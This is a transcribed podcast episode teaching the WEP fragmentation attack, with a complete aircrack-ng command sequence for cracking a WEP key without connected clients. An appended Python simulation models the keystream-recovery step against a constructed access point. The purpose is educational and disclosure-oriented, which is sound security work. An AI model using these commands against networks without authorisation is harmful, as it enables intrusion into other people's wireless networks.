Episode: 161
Title: HPR0161: Hacking WEP
Source: https://hub.hackerpublicradio.org/ccdn.php?filename=/eps/hpr0161/hpr0161.mp3
Transcribed: 2025-10-07 12:35:41

---
Well hello, welcome HPR listeners. This is Finux's Student Hacker's Guide to Linux and, surprise surprise, I'm your host Finux. Today I want to talk about the fragmentation attack used for hacking WEP, basically. Before I start off, there's a couple of things that I'd like to quickly mention. First and foremost, I'm actually recording this slightly differently from the way that I normally record episodes like this. Normally I write a script, or a sort of script, and I kind of stick around there and work with that. However, this time I've kind of decided to just record and talk about it. Obviously, if you like the way that I used to do things, please drop us a line. If you like the way that I used to do things, I'll go back to the other way as well. So this is just kind of like a little experiment. Hopefully it will be a bit better, but maybe not. I'd also like to take this opportunity to apologise to Enigma and to you guys at HPR as well. I was booked in to release an episode on 31st of July. However, I've started a new job and I also came down with a pretty, pretty tough viral infection. It's kind of had me pretty waylaid for the past two weeks. So if I cough and sneeze all the way through this, you'll know why. But I'm hoping that this episode will go a long way to getting you guys to forgive me anyway. So that's kind of the stuff I wanted to get out of the way first. So let's get onto the meat and potatoes of what I'm talking about today.
I've been very interested in WEP for quite some time. There's a number of reasons why. I mean, the reason that I do a lot of looking at WEP is that an awful lot of people still use WEP, which always surprises me, because the vulnerabilities in WEP are not unknown. These are very well documented issues in WEP and have been for quite some time. However, there's still organisations and there's still businesses that are using it. And it's a very, very vulnerable technology, to say the least. The fragmentation attack came around in about 2007. I don't really want to get overly technical about it. What I really want to do is just kind of run through the attack so that you guys can see how it works. And then I'm going to release some sort of show notes over at the Linux Society. And I'll give you the URL for that later on, probably at the end. And in there, I'll put lists of stuff that I refer to and packages that you'll need to install and maybe just a demo of it.

But what the fragmentation attack does is, basically... I'll put some light on what I was doing earlier on today with it. I set up a wireless network with a 128-bit random WEP key. I then used a fragmentation attack to basically hack the wireless network. There were no clients attached to the wireless network and I managed to produce the WEP key in less than four minutes. I think it was about three minutes 52 seconds, if you're being precise. And that's for 128-bit. When I did the same test on 64-bit, it took less than a minute. By the time the package had loaded up, it told me what the key was. The big kind of indicator here is that you don't need any clients attached to the wireless network. Some of you guys that may have experience in WEP hacking maybe use the concept of needing to have people associated with the wireless network to generate traffic, to collect weak IVs that way. Well, what this attack does is it takes that whole need to have clients out. And what you do is you're able to produce the traffic. And because you're able to produce the traffic, you're able to get as many IVs as you need.

Why I really kind of wanted to shine a light on this attack is, the reality of it is, now when a hacker finds a wireless network that has WEP encryption, there isn't a real time deterrent for them anymore. I have to be honest with you. I mean, the reason that WEP was used is that the vulnerability in WEP was well known before it became popular. But the argument was that it would still be time consuming for a hacker to basically hack WEP and that they would move to an open network. Well, the reality of this attack now is it's not a question of if the hacker can get onto the network, but more a question of "it will take me five minutes until I get online". And that's pretty ill; that's no real deterrent. I'll have to dig up the paper, but I believe that JANET, which is the Joint Academic Network (basically, it's kind of like an academic ISP in the UK), have dropped WEP. They don't recommend it. However, there are still UK ISPs that are sending out boxes, routers basically, with 64-bit WEP encryption, and they're sending these out to businesses and to homes. So I can't mention any names for obvious reasons. But yeah, this technology, this antiquated technology that's causing problems, that's very easy to crack, is being shipped out left, right and centre. And the real issue with this is that it's a false sense of security that we're offering people. They're sitting there thinking that the wireless network is secured. And hopefully, by the end of this episode today, I'll show you that it's far from being secured. But yeah, I'm going to stop rambling and I suppose it's time to get onto the meat and potatoes of what I'm actually going to talk about today.

OK, I suppose the next thing I need to do is do the technology kind of health warnings and sort of disclaimer bit. Obviously I'm doing this for educational purposes. I don't condone you hacking anyone's network. I don't promote it. If you go and hack someone's wireless network and you don't have permission to do it and you get caught, you're on your own. At the end of the day, this is purely for demonstration purposes.
Also, I'm not going to go through every possible combination of how you can do this. The technology, the platform that I used today to do this hack is, I use the Eee PC. I've got Ubuntu Eee running on there. Very nice, I must admit; my commands are for that. There is a distro called BackTrack 3. I'm sure most of you guys know it. That has all the tools that you could possibly need to do this sort of attack on as well. There's lots of options, but it's basically your prerogative to match your configurations to mine.

I suppose what we need to do now is get on with hacking a wireless network. Some of the packages that you're going to need for this are going to be airmon-ng, aireplay-ng, packetforge-ng and aircrack-ng. You should be able to get most of these packages through a repository or download and compile from source. It should be pretty easy. What I did, just to give you a rough idea, is I got a separate wireless router so that I wasn't interfering with anyone's network, and I set this up to be called Finux Wireless Network, very original I know. I then went to a website that generates random keys and I generated a random 128-bit key and then used that.

Now, before I start, it's probably well worth mentioning that there's an absolute ton of video how-to guides that are probably going to do a job a lot better than I am. But if you just go onto YouTube and do a search for "WEP fragmentation attack" there's tons and tons of really, really good how-to guides on this. Like I said before, this is not an undocumented hack by any stretch of the imagination. One that I saw that I thought was very, very clever, and often you find these clever things are normally the simplest things: in this attack you need to call the MAC address of the AP quite a bit. You need to call the MAC address of your wireless card quite a bit. What he did right at the beginning of the attack was put in "export AP=" and then the MAC address of the AP, and then "export WIFI=" and then the MAC address of his wireless card. Which, to be honest with you, later on will make a lot more sense, but what he then does is, in the commands, he's able to call the variable, which is a lot easier than having to constantly type in the MAC address. So I can tell you that for nothing.

The packages you are going to need, you should find them in most package repositories, package managers, and you'll be able to go to the websites and stuff like that. There's a package called airmon-ng. You'll definitely need that. You'll definitely need aireplay-ng. You're definitely going to need a package called packetforge-ng as well, and I think you're going to need to get a copy of airodump-ng and aircrack-ng as well. But anyway, what I'll do is I'll go through the commands that I've used, and what I'll do is I'm just going to refer to AP when I'm meaning the... I'm going to say "variable AP" when I'm actually meaning the MAC address of the AP, and I'm going to say "variable WIFI" when I'm meaning the MAC address of the wireless card. I know this sounds a little bit confusing, but I'll try and write it in the show notes so it'll make a lot more sense. The first command: these are all root commands, but because I've been using Ubuntu they've all got sudo before them. But, like I say, these all work fine in a root terminal.
The first one I used was "sudo airmon-ng start wifi0", and what that did was start monitor mode on, basically, my wireless card, which is wifi0. I used "sudo wlanconfig ath0 destroy"; I just got rid of anything in the ath0 section. I did "sudo ifconfig ath1 up", and ath1 is the device that I'm using for the hack. The next one is "sudo iwconfig ath1 mode monitor channel 13". What this does is put your card into, basically, a promiscuous mode. The AP that I wanted to hack happened to be on channel 13. Lucky for some.

Next command, this is a bit of a mouthful, so what it is is "sudo aireplay-ng -1 0 -e" and in here you want to put in the wireless network's name, so in my case it's Finux Wireless Network; "-a" and in here you want to put the MAC address of the AP, so what you would be able to do is put variable AP if you did what I said earlier on, otherwise just paste in the MAC address of the one that you want to attack; "-h" and this will be the MAC address of your wireless card, so if you declared that variable it would have been $WIFI; then ath1. So just kind of read that back without all the stopping and starting. It's basically: sudo aireplay-ng -1 0 -e "Finux Wireless Network" -a $AP -h $WIFI ath1

The next command that you want to use is sudo aireplay-ng -5. So that's: sudo aireplay-ng -5 -b $AP -h $WIFI ath1. So basically that is sudo aireplay-ng -5 -b the MAC address of your AP, so if you declared that variable... again, this is why I said at the beginning it's well worth declaring that variable, because you just spend your lifetime putting these back in again. So: sudo aireplay-ng -5 -b $AP -h $WIFI ath1

The next package that you're going to use is a package called packetforge-ng. Now this command is a bit of a mouthful. So what you'll find from the first command is that you get a file called fragment-, whatever the date of when you did it, whatever the time was, .xor, and you'll be calling this in the next command, which is (there's no need for sudo on this): packetforge-ng -0 -a $AP -h $WIFI -k 255.255.255.255 -l 255.255.255.255 -y the fragmentation file .xor -w arp-request. OK, so that's packetforge-ng -0, -a the BSSID MAC address, -h the MAC address of your wireless card, -k 255.255.255.255, -l 255.255.255.255, -y fragmentation file .xor, -w arp-request. OK, what that'll do is that'll forge, basically, an ARP request.

OK, the next command that you want to run is: sudo airodump-ng -c 13 (because that's the channel that I'm on) --bssid $AP -w capture ath1. OK, what that'll do is that'll open up a terminal... well, that needs to run in the background. So, once you've got that command, what you need to do now is move to another terminal; make sure that you're certainly in the working directory where that arp-request that you used packetforge-ng for is. OK, now in a new terminal, and it'll be: sudo aireplay-ng -2 -r arp-request ath1. That's arp-request, that's the file that we made with packetforge-ng. OK, and you need to leave that running in its own terminal, and then what you need to do is open up one more terminal and type in: sudo aircrack-ng -z *.cap. And what this'll do is this'll load everything that ends in .cap that you've been making in the past and it'll start running its attack against them. And the great, great thing about this is that this can run while you're collecting IVs. OK, so what you should be left with now is you should be left with three terminal windows open, OK: one sending this forged ARP request, one monitoring the downloads and collecting them, and the other one cracking the IVs. OK, and that's it, that's it in a nutshell. You should get a screen... if you're cracking 128-bit it'll probably take a couple of minutes; if you're cracking 64-bit you should probably get a response pretty much within a minute. And what it will do is it will tell you that it's found the key, and from there it'll give you the hex for the WEP key, or the ASCII as well.
OK, so a quick run through those commands again. First, like I say, my recommendation is to put some variables at the beginning of this. So, like I say, it's probably best to declare the variables now: "export AP=" and then put the MAC address of the AP there, OK. The next one would be "export WIFI=" the MAC address of your wireless card. OK, the commands are as follows:

  sudo airmon-ng start wifi0
  sudo wlanconfig ath0 destroy
  sudo ifconfig ath1 up
  sudo iwconfig ath1 mode monitor channel 13
  sudo aireplay-ng -1 0 -e "Finux Wireless Network" -a $AP -h $WIFI ath1   (in your case, the wireless network that you're attacking)
  sudo aireplay-ng -5 -b $AP -h $WIFI ath1
  packetforge-ng -0 -a $AP -h $WIFI -k 255.255.255.255 -l 255.255.255.255 -y <the fragmentation file that you've made>.xor -w arp-request
  sudo airodump-ng -c 13 --bssid $AP -w capture ath1   (the 13 is just the number of the channel; don't type "channel 13")

OK, then you'll need to open up another terminal window and leave that running in there, and then in this one it would be: sudo aireplay-ng -2 -r arp-request ath1. Leave that running, open another terminal window, and then if you type in "sudo aircrack-ng -z *.cap" it'll actually crack your IVs for you.

Well, as promised, there's some show notes to go along with this podcast. You can find them on our website, which is www.thelinuxsociety.org.uk, that's www.thelinuxsociety.org.uk, and if you just go there and look for my blog, it should be Finux's blog, you'll find basically a quick guide of how I did this, any links or anything like that that I thought were interesting, all of that sort of stuff. And that kind of brings us to the end. I hope you've enjoyed it and, you know, you've learned a little bit about how insecure WEP actually is.

Before I go, I would just like to do a quick shout out to my pal Chad Wollenberg over at the Linux Basement, a very cool Linux podcast. I started off doing these things for him over there, so I'm here today thanks to the Linux Basement. So a big shout out to you, dude, and keep on rocking with those songs. All right, anyway, thanks very much for listening guys, and a little good night.
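The walkthrough above drives the attack with aireplay-ng -5 (recover keystream) and packetforge-ng -0 (forge an ARP request with the recovered .xor keystream). The Python below is an added example, not code from the episode or from the aircrack-ng project, that simulates the mechanism those two steps rely on so you can see why no associated clients and no key are needed. It assumes a simplified access point that decrypts each fragment with the real key, drops it on a bad ICV, reassembles the fragments and relays the whole frame re-encrypted under its next IV; it ignores 802.11 headers and the real-world requirement that the reassembled frame be something the AP will actually relay (for example, to the broadcast address). The WEP key, IVs, MAC and IP addresses are constructed for the demo.

```python
import struct
import zlib
from typing import List, Optional, Tuple

# LLC/SNAP header + EtherType 0x0806: the first 8 plaintext bytes of every ARP frame,
# which is the known plaintext the fragmentation attack starts from.
LLC_SNAP_ARP = bytes.fromhex("aaaa030000000806")
MAX_FRAGMENTS = 16       # 802.11 allows at most 16 fragments per MSDU
TARGET_KEYSTREAM = 1500  # enough keystream to forge a full-size frame


def rc4(key: bytes, length: int) -> bytes:
    """RC4 keystream (KSA + PRGA); WEP keys RC4 with IV || secret key."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out, i, j = bytearray(), 0, 0
    for _ in range(length):
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def icv(data: bytes) -> bytes:
    """WEP integrity check value: little-endian CRC-32 appended before encryption."""
    return struct.pack("<I", zlib.crc32(data) & 0xFFFFFFFF)


def wep_encrypt(key: bytes, iv: bytes, plaintext: bytes) -> bytes:
    body = plaintext + icv(plaintext)
    return iv + xor(body, rc4(iv + key, len(body)))


def wep_decrypt(key: bytes, frame: bytes) -> Optional[bytes]:
    iv, ct = frame[:3], frame[3:]
    body = xor(ct, rc4(iv + key, len(ct)))
    pt, tag = body[:-4], body[-4:]
    return pt if icv(pt) == tag else None   # None models "bad ICV, frame dropped"


def encrypt_with_keystream(iv: bytes, keystream: bytes, plaintext: bytes) -> bytes:
    """Forge a frame from recovered keystream alone (what packetforge-ng does with the .xor file)."""
    body = plaintext + icv(plaintext)
    if len(body) > len(keystream):
        raise ValueError("not enough keystream for this frame")
    return iv + xor(body, keystream)


def build_arp_request(sender_mac: bytes, sender_ip: bytes, target_ip: bytes) -> bytes:
    """ARP request payload, like packetforge-ng -0 with -k/-l (255.255.255.255 in the episode)."""
    return (LLC_SNAP_ARP + struct.pack("!HHBBH", 1, 0x0800, 6, 4, 1)
            + sender_mac + sender_ip + b"\x00" * 6 + target_ip)


class AccessPoint:
    """Assumed AP model: decrypt fragments, drop on bad ICV, reassemble, relay under a fresh IV."""
    def __init__(self, key: bytes):
        self._key = key
        self._next_iv = 0x100000   # constructed IV counter

    def relay(self, fragments: List[bytes]) -> Optional[bytes]:
        parts = []
        for frag in fragments:
            pt = wep_decrypt(self._key, frag)
            if pt is None:
                return None
            parts.append(pt)
        self._next_iv += 1
        return wep_encrypt(self._key, self._next_iv.to_bytes(3, "big"), b"".join(parts))


def fragmentation_attack(ap: AccessPoint, captured_frame: bytes) -> Tuple[bytes, bytes, int]:
    """Grow 8 known keystream bytes to TARGET_KEYSTREAM bytes; returns (iv, keystream, rounds)."""
    iv = captured_frame[:3]
    ks = xor(captured_frame[3:11], LLC_SNAP_ARP)   # 8 PRGA bytes: ciphertext XOR known header
    rounds = 0
    while len(ks) < TARGET_KEYSTREAM:
        per_frag = len(ks) - 4                        # 4 keystream bytes go to each fragment's ICV
        total = min(MAX_FRAGMENTS * per_frag, TARGET_KEYSTREAM - 4)
        chosen = bytes((rounds * 7 + i) & 0xFF for i in range(total))   # attacker-chosen, so known
        frags = [encrypt_with_keystream(iv, ks, chosen[o:o + per_frag])
                 for o in range(0, total, per_frag)]
        relayed = ap.relay(frags)
        if relayed is None:
            raise RuntimeError("AP dropped a fragment: keystream guess was wrong")
        # The AP re-encrypted our known plaintext (+ ICV) under a new IV: that IV's keystream is ours.
        iv, ks = relayed[:3], xor(relayed[3:], chosen + icv(chosen))
        rounds += 1
    return iv, ks, rounds


def demo() -> dict:
    key = bytes.fromhex("0123456789abcdef0123456789")   # constructed 104-bit ("128-bit") WEP key
    ap = AccessPoint(key)
    # Constructed capture: one ARP frame from a legitimate station is all the attacker starts from.
    station = bytes.fromhex("001122334455")
    captured = wep_encrypt(key, b"\x0a\x0b\x0c",
                           build_arp_request(station, bytes([192, 168, 1, 10]), bytes([192, 168, 1, 1])))
    iv, ks, rounds = fragmentation_attack(ap, captured)
    attacker = bytes.fromhex("00deadbeef00")
    forged = encrypt_with_keystream(iv, ks, build_arp_request(attacker, b"\xff" * 4, b"\xff" * 4))
    bad = forged[:-1] + bytes([forged[-1] ^ 1])          # one flipped ICV byte
    return {
        "rounds": rounds,
        "keystream_len": len(ks),
        "keystream_correct": ks == rc4(iv + key, len(ks)),   # equals the real PRGA for that IV
        "forged_accepted": wep_decrypt(key, forged) is not None,
        "bad_icv_dropped": ap.relay([bad]) is None,
    }


if __name__ == "__main__":
    print(demo())
```

Running demo() shows the whole chain from the episode: 8 keystream bytes taken from a single captured ARP frame become 68, then 1028, then 1500 bytes in three rounds of fragment-and-relay, the 1500-byte keystream is bit-for-bit the real RC4 output for that IV even though the key was never touched, and a forged ARP request built from it passes the AP's ICV check while a frame with a single corrupted ICV byte is dropped. That forged request is what aireplay-ng -2 then replays to make the AP generate the IVs aircrack-ng needs.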
|